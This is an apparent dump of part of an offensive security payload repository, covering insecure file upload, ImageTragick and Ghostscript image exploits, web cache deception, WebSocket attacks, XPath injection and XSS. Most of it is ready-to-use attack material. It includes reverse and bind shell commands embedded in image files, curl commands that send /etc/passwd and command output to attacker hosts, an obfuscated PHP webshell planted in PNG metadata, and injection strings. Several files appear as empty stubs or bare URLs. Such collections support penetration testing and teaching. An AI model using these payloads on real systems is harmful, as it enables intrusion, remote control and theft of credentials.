--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.php3:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.php4:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.php5:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.php7:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.phpt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.pht:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.phtml:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.png.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.png?shell.php:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/README.md:
--------------------------------------------------------------------------------
1 | # Image Tragik 1 & 2
2 |
3 |
4 | ## Exploit v1
5 |
6 | Simple reverse shell
7 |
8 | ```powershell
9 | push graphic-context
10 | encoding "UTF-8"
11 | viewbox 0 0 1 1
12 | affine 1 0 0 1 0 0
13 | push graphic-context
14 | image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
15 | pop graphic-context
16 | pop graphic-context
17 | ```
18 |
19 | ## Exploit v2
20 |
21 | Simple `id` payload
22 |
23 | ```powershell
24 | %!PS
25 | userdict /setpagedevice undef
26 | save
27 | legal
28 | { null restore } stopped { pop } if
29 | { legal } stopped { pop } if
30 | restore
31 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops
32 | ```
33 |
34 | then use `convert shellexec.jpeg whatever.gif`
35 |
36 | ## Thanks to
37 |
38 | * [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2)
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg:
--------------------------------------------------------------------------------
1 |
3 | xmlns="http://www.w3.org/2000/svg">
4 |
5 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg:
--------------------------------------------------------------------------------
1 |
3 | xmlns="http://www.w3.org/2000/svg">
4 |
5 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg:
--------------------------------------------------------------------------------
1 | %!PS
2 | userdict /setpagedevice undef
3 | legal
4 | { null restore } stopped { pop } if
5 | legal
6 | mark /OutputFile (%pipe%curl http://attacker.com/?a=callback) currentdevice putdeviceprops
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf:
--------------------------------------------------------------------------------
1 | %!PS
2 | currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) )
3 | .putdeviceparams
4 | quit
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg:
--------------------------------------------------------------------------------
1 | %!PS
2 | userdict /setpagedevice undef
3 | legal
4 | { null restore } stopped { pop } if
5 | legal
6 | mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/127.0.0.1/8080 0>&1') currentdevice putdeviceprops
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | image over 0,0 0,0 'pango:@/etc/passwd'
4 | pop graphic-context
5 |
6 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | image over 0,0 0,0 'text:/etc/passwd'
4 | pop graphic-context
5 |
6 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | encoding "UTF-8"
3 | viewbox 0 0 1 1
4 | affine 1 0 0 1 0 0
5 | push graphic-context
6 | image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
7 | pop graphic-context
8 | pop graphic-context
9 |
10 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | encoding "UTF-8"
3 | viewbox 0 0 1 1
4 | affine 1 0 0 1 0 0
5 | push graphic-context
6 | image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc 127.0.0.1 4444 0/tmp/gjdpez 2>&1; rm /tmp/gjdpez '
7 | pop graphic-context
8 | pop graphic-context
9 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 127.0.0.1:1337 > /dev/null`'
4 | pop graphic-context
5 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(https://example.com/image.jpg"|nc -l -p 7777 -e"/bin/sh)'
4 | pop graphic-context
5 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "127.0.0.1)'
4 | pop graphic-context
5 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(http://localhost:PORT/)'
4 | pop graphic-context
5 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(http://IP_ATTAQUANT/)'
4 | pop graphic-context
5 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(https://IP_ATTAQUANT"||/bin/bash -c "ls > /dev/tcp/IP_ATTAQUANT/80)'
4 | pop graphic-context
5 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(https://127.0.0.0/oops.jpg"|touch "rce1)'
4 | pop graphic-context
5 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml:
--------------------------------------------------------------------------------
1 |
2 |
4 |
7 |
9 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
5 |
6 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg:
--------------------------------------------------------------------------------
1 | push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1 ")' pop graphic-context
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg:
--------------------------------------------------------------------------------
1 | %!PS
2 | userdict /setpagedevice undef
3 | legal
4 | { null restore } stopped { pop } if
5 | legal
6 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg:
--------------------------------------------------------------------------------
1 | %!PS
2 | userdict /setpagedevice undef
3 | save
4 | legal
5 | { null restore } stopped { pop } if
6 | { legal } stopped { pop } if
7 | restore
8 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg:
--------------------------------------------------------------------------------
1 | %!PS
2 | userdict /setpagedevice undef
3 | save
4 | legal
5 | { null restore } stopped { pop } if
6 | { legal } stopped { pop } if
7 | restore
8 | mark /OutputFile (%pipe%ncat 127.0.0.1 4242 -e /bin/sh) currentdevice putdeviceprops
9 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg:
--------------------------------------------------------------------------------
1 | %!PS
2 | userdict /setpagedevice undef
3 | legal
4 | { null restore } stopped { pop } if
5 | legal
6 | mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1') currentdevice putdeviceprops
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/Build_image_to_LFI.py:
--------------------------------------------------------------------------------
1 | from __future__ import print_function
2 | from PIL import Image
3 |
4 | # Shellcodes - Bypass included : Keyword Recognition : System, GET, php
5 | # --- How to use : http://localhost/shell.php?c=echo%20'';ls
6 |
7 | #shellcode = "=@`$_GET[c]`;"
8 | shellcode = ""
9 | # --- How to use : http://localhost/shell.php?_=system&__=echo%20'';ls
10 | shellcode2 = "='Sh3ll'; $_='{';$_=($_^'<').($_^'>;').($_^'/');?>=${'_'.$_}['_'](${'_'.$_}['__']);?>"
11 |
12 |
13 | print("\n[+] Advanced Upload - Shell inside metadatas of a PNG file")
14 |
15 | # Create a backdoored PNG
16 | print(" - Creating a payload.png")
17 | im = Image.new("RGB", (10,10), "Black")
18 | im.info["shell"] = shellcode
19 | reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')
20 |
21 | # undocumented class
22 | from PIL import PngImagePlugin
23 | meta = PngImagePlugin.PngInfo()
24 |
25 | # copy metadata into new object
26 | for k,v in im.info.items():
27 | if k in reserved: continue
28 | meta.add_text(k, v, 0)
29 | im.save("payload.png", "PNG", pnginfo=meta)
30 |
31 | print("Done")
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_system.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Metadata/PHP_exif_system.gif
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_system.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Metadata/PHP_exif_system.png
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/GIF_exploit.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Resize/GIF_exploit.gif
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/README.txt:
--------------------------------------------------------------------------------
1 | # How to use
2 | b.php?c=ls
3 |
4 |
5 | Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/exploit_PNG_110x110.php:
--------------------------------------------------------------------------------
1 |
2 |
3 | header('Content-Type: image/png');
4 |
5 | $p = array(0xA3, 0x9F, 0x67, 0xF7, 0x0E, 0x93, 0x1B, 0x23, 0xBE, 0x2C, 0x8A, 0xD0, 0x80, 0xF9, 0xE1, 0xAE, 0x22, 0xF6, 0xD9, 0x43, 0x5D, 0xFB, 0xAE, 0xCC, 0x5A, 0x01, 0xDC, 0xAA, 0x52, 0xD0, 0xB6, 0xEE, 0xBB, 0x3A, 0xCF, 0x93, 0xCE, 0xD2, 0x88, 0xFC, 0x69, 0xD0, 0x2B, 0xB9, 0xB0, 0xFB, 0xBB, 0x79, 0xFC, 0xED, 0x22, 0x38, 0x49, 0xD3, 0x51, 0xB7, 0x3F, 0x02, 0xC2, 0x20, 0xD8, 0xD9, 0x3C, 0x67, 0xF4, 0x50, 0x67, 0xF4, 0x50, 0xA3, 0x9F, 0x67, 0xA5, 0xBE, 0x5F, 0x76, 0x74, 0x5A, 0x4C, 0xA1, 0x3F, 0x7A, 0xBF, 0x30, 0x6B, 0x88, 0x2D, 0x60, 0x65, 0x7D, 0x52, 0x9D, 0xAD, 0x88, 0xA1, 0x66, 0x94, 0xA1, 0x27, 0x56, 0xEC, 0xFE, 0xAF, 0x57, 0x57, 0xEB, 0x2E, 0x20, 0xA3, 0xAE, 0x58, 0x80, 0xA7, 0x0C, 0x10, 0x55, 0xCF, 0x09, 0x5C, 0x10, 0x40, 0x8A, 0xB9, 0x39, 0xB3, 0xC8, 0xCD, 0x64, 0x45, 0x3C, 0x49, 0x3E, 0xAD, 0x3F, 0x33, 0x56, 0x1F, 0x19 );
6 |
7 | $img = imagecreatetruecolor(110, 110);
8 |
9 | for ($y = 0; $y < sizeof($p); $y += 3) {
10 | $r = $p[$y];
11 | $g = $p[$y+1];
12 | $b = $p[$y+2];
13 | $color = imagecolorallocate($img, $r, $g, $b);
14 | imagesetpixel($img, round($y / 3)*2, 0, $color);
15 | imagesetpixel($img, round($y / 3)*2+1, 0, $color);
16 | imagesetpixel($img, round($y / 3)*2, 1, $color);
17 | imagesetpixel($img, round($y / 3)*2+1, 1, $color);
18 | }
19 |
20 | imagepng($img);
21 |
22 | ?>
--------------------------------------------------------------------------------
/Upload Insecure Files/Server Side Include/exec.shtml:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Server Side Include/include.shtml:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Server Side Include/index.stm:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/Upload Insecure Files/Zip Slip/README.md:
--------------------------------------------------------------------------------
1 | # Zip Slip
2 |
3 | > The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine.
4 |
5 | ## Summary
6 |
7 | - [Detection](#detection)
8 | - [Tools](#tools)
9 | * [Exploits](#exploits)
10 | * [Basic Exploit](#basic-exploit)
11 | - [Additional Notes](#additional-notes)
12 |
13 | ## Detection
14 |
15 | - Any zip upload page on the application
16 |
17 | ## Tools
18 |
19 | - evilarc [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)
20 |
21 | ## Exploits
22 |
23 | ### Basic Exploit
24 |
25 | ```python
26 | python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
27 | ```
28 |
29 | ### Additional Notes
30 | - For affected libraries and projects, visit https://github.com/snyk/zip-slip-vulnerability
31 |
32 | ## References
33 |
34 | - [Zip Slip Vulnerability - Snyk Ltd, 2019](https://snyk.io/research/zip-slip-vulnerability)
35 | - [Zip Slip - snyk, 2019](https://github.com/snyk/zip-slip-vulnerability)
36 |
--------------------------------------------------------------------------------
/Web Cache Deception/README.md:
--------------------------------------------------------------------------------
1 | # Web Cache Deception Attack
2 |
3 | ## Tools
4 |
5 | * [Param Miner - PortSwigger](https://github.com/PortSwigger/param-miner)
6 | > This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.
7 |
8 | ## Exploit
9 |
10 | 1. Browser requests `http://www.example.com/home.php/non-existent.css`.
11 | 2. Server returns the content of `http://www.example.com/home.php`, most probably with HTTP caching headers that instruct to not cache this page.
12 | 3. The response goes through the proxy.
13 | 4. The proxy identifies that the file has a css extension.
14 | 5. Under the cache directory, the proxy creates a directory named home.php, and caches the imposter "CSS" file (non-existent.css) inside.
15 |
16 | ## Methodology of the attack - example
17 |
18 | 1. Normal browsing, visit home : `https://www.example.com/myaccount/home/`
19 | 2. Open the malicious link : `https://www.example.com/myaccount/home/malicious.css`
20 | 3. The page is displayed as /home and the cache is saving the page
21 | 4. Open a private tab with the previous URL : `https://www.paypal.com/myaccount/home/malicous.css`
22 | 5. The content of the cache is displayed
23 |
24 | Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
25 | [](https://vimeo.com/249130093)
26 |
27 | ## Methodology 2
28 |
29 | 1. Find an unkeyed input for a Cache Poisoning
30 | ```js
31 | Values: User-Agent
32 | Values: Cookie
33 | Header: X-Forwarded-Host
34 | Header: X-Host
35 | Header: X-Forwarded-Server
36 | Header: X-Forwarded-Scheme (header; also in combination with X-Forwarded-Host)
37 | Header: X-Original-URL (Symfony)
38 | Header: X-Rewrite-URL (Symfony)
39 | ```
40 | 2. Cache poisoning attack - Example for `X-Forwarded-Host` unkeyed input (remember to use a buster to only cache this webpage instead of the main page of the website)
41 | ```js
42 | GET /test?buster=123 HTTP/1.1
43 | Host: target.com
44 | X-Forwarded-Host: test">
45 |
46 | HTTP/1.1 200 OK
47 | Cache-Control: public, no-cache
48 | [..]
49 | ">
50 | ```
51 |
52 |
53 | ## References
54 |
55 | * [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
56 | * [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
57 | * [Web Cache Entanglement: Novel Pathways to Poisoning - James Kettle @albinowax](https://portswigger.net/research/web-cache-entanglement)
58 | * [Web Cache Deception Attack leads to user info disclosure - Kunal pandey - Feb 25](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29)
59 | * [Web cache poisoning - Web Security Academy learning materials](https://portswigger.net/web-security/web-cache-poisoning)
60 | - [Exploiting cache design flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws)
61 | - [Exploiting cache implementation flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws)
62 |
--------------------------------------------------------------------------------
/Web Sockets/Files/ws-harness.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | from __future__ import print_function
3 | import socket,ssl
4 | from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
5 | from websocket import create_connection, WebSocket
6 | from urlparse import parse_qs
7 | import argparse
8 | import os
9 |
10 | LOOP_BACK_PORT_NUMBER = 8000
11 |
12 | def FuzzWebSocket(fuzz_value):
13 | print(fuzz_value)
14 | ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0])))
15 | result = ws.recv()
16 | return result
17 |
18 | def LoadMessage(file):
19 | file_contents = ""
20 | try:
21 | if os.path.isfile(file):
22 | f = open(file,'r')
23 | file_contents = f.read()
24 | f.close()
25 | except:
26 | print("Error reading file: %s" % file)
27 | exit()
28 | return file_contents
29 |
30 | class myWebServer(BaseHTTPRequestHandler):
31 |
32 | #Handler for the GET requests
33 | def do_GET(self):
34 | qs = parse_qs(self.path[2:])
35 | fuzz_value = qs['fuzz']
36 | result = FuzzWebSocket(fuzz_value)
37 | self.send_response(200)
38 | self.send_header('Content-type','text/html')
39 | self.end_headers()
40 | self.wfile.write(result)
41 | return
42 |
43 | parser = argparse.ArgumentParser(description='Web Socket Harness: Use traditional tools to assess web sockets')
44 | parser.add_argument('-u','--url', help='The remote WebSocket URL to target.',required=True)
45 | parser.add_argument('-m','--message', help='A file that contains the WebSocket message template to send. Please place [FUZZ] where injection is desired.',required=True)
46 | args = parser.parse_args()
47 |
48 | ws_message = LoadMessage(args.message)
49 |
50 | ws = create_connection(args.url,sslopt={"cert_reqs": ssl.CERT_NONE},header={},http_proxy_host="", http_proxy_port=8080)
51 |
52 | try:
53 | #Create a web server and define the handler to manage the
54 | #incoming request
55 | server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer)
56 | print('Started httpserver on port ' , LOOP_BACK_PORT_NUMBER)
57 |
58 | #Wait forever for incoming http requests
59 | server.serve_forever()
60 |
61 | except KeyboardInterrupt:
62 | print('^C received, shutting down the web server')
63 | server.socket.close()
64 | ws.close()
65 |
--------------------------------------------------------------------------------
/Web Sockets/Images/WebsocketHarness.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Web Sockets/Images/WebsocketHarness.jpg
--------------------------------------------------------------------------------
/Web Sockets/Images/sqlmap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Web Sockets/Images/sqlmap.png
--------------------------------------------------------------------------------
/Web Sockets/Images/websocket-harness-start.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Web Sockets/Images/websocket-harness-start.png
--------------------------------------------------------------------------------
/Web Sockets/README.md:
--------------------------------------------------------------------------------
1 | # Web Sockets Attacks
2 |
3 | > The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server
4 |
5 | ## Summary
6 |
7 | * [Tools](#tools)
8 | * [Using ws-harness.py](#using-ws-harness-py)
9 |
10 | ## Tools
11 |
12 | * [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
13 |
14 | ## Using ws-harness.py
15 |
16 | Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.
17 |
18 | ```powershell
19 | python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt
20 | ```
21 |
22 | The content of the message should contains the **[FUZZ]** keyword.
23 |
24 | ```json
25 | {"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}
26 | ```
27 |
28 | Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket.
29 |
30 | ```python
31 | sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
32 | ```
33 |
34 | ## Cross-Site WebSocket Hijacking (CSWSH)
35 |
36 | If the WebSocket handshake is not correctly protected using a CSRF token or a
37 | nonce, it's possible to use the authenticated WebSocket of a user on an
38 | attacker's controlled site because the cookies are automatically sent by the
39 | browser. This attack is called Cross-Site WebSocket Hijacking (CSWSH).
40 |
41 | Example exploit, hosted on an attacker's server, that exfiltrates the received
42 | data from the WebSocket to the attacker:
43 |
44 | ```html
45 |
55 | ```
56 |
57 | You have to adjust the code to your exact situation. E.g. if your web
58 | application uses a `Sec-WebSocket-Protocol` header in the handshake request,
59 | you have to add this value as a 2nd parameter to the `WebSocket` function call
60 | in order to add this header.
61 |
62 | ## References
63 |
64 | - [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
65 | - [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)
66 | - [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#)
67 |
--------------------------------------------------------------------------------
/XPATH Injection/README.md:
--------------------------------------------------------------------------------
1 | # XPATH injection
2 |
3 | > XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
4 |
5 | ## Summary
6 |
7 | * [Exploitation](#exploitation)
8 | * [Blind exploitation](#blind-exploitation)
9 | * [Out Of Band Exploitation](#out-of-band-exploitation)
10 | * [Tools](#tools)
11 | * [References](#references)
12 |
13 | ## Exploitation
14 |
15 | Similar to SQL : `"string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())"`
16 |
17 | ```sql
18 | ' or '1'='1
19 | ' or ''='
20 | x' or 1=1 or 'x'='y
21 | /
22 | //
23 | //*
24 | */*
25 | @*
26 | count(/child::node())
27 | x' or name()='username' or 'x'='y
28 | ' and count(/*)=1 and '1'='1
29 | ' and count(/@*)=1 and '1'='1
30 | ' and count(/comment())=1 and '1'='1
31 | search=')] | //user/*[contains(*,'
32 | search=Har') and contains(../password,'c
33 | search=Har') and starts-with(../password,'c
34 | ```
35 |
36 | ## Blind Exploitation
37 |
38 | 1. Size of a string
39 | ```sql
40 | and string-length(account)=SIZE_INT
41 | ```
42 | 2. Extract a character
43 | ```sql
44 | substring(//user[userid=5]/username,2,1)=CHAR_HERE
45 | substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
46 | ```
47 |
48 | ## Out Of Band Exploitation
49 |
50 | ```powershell
51 | http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
52 | ```
53 |
54 | ## Tools
55 |
56 | - [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
57 | - [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool
58 | - [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text
59 | - [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
60 | - [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
61 |
62 | ## References
63 |
64 | * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
65 | * [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
66 |
--------------------------------------------------------------------------------
/XSS Injection/Files/">
:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/">
--------------------------------------------------------------------------------
/XSS Injection/Files/'>:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/'>
--------------------------------------------------------------------------------
/XSS Injection/Files/InsecureFlashFile.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/InsecureFlashFile.swf
--------------------------------------------------------------------------------
/XSS Injection/Files/JupyterNotebookXSS.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "metadata": {},
6 | "source": [
7 | "[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+Cg==)\n"
8 | ]
9 | }
10 | ],
11 | "metadata": {
12 | "kernelspec": {
13 | "display_name": "Python 3",
14 | "language": "python",
15 | "name": "python3"
16 | },
17 | "language_info": {
18 | "codemirror_mode": {
19 | "name": "ipython",
20 | "version": 3
21 | },
22 | "file_extension": ".py",
23 | "mimetype": "text/x-python",
24 | "name": "python",
25 | "nbconvert_exporter": "python",
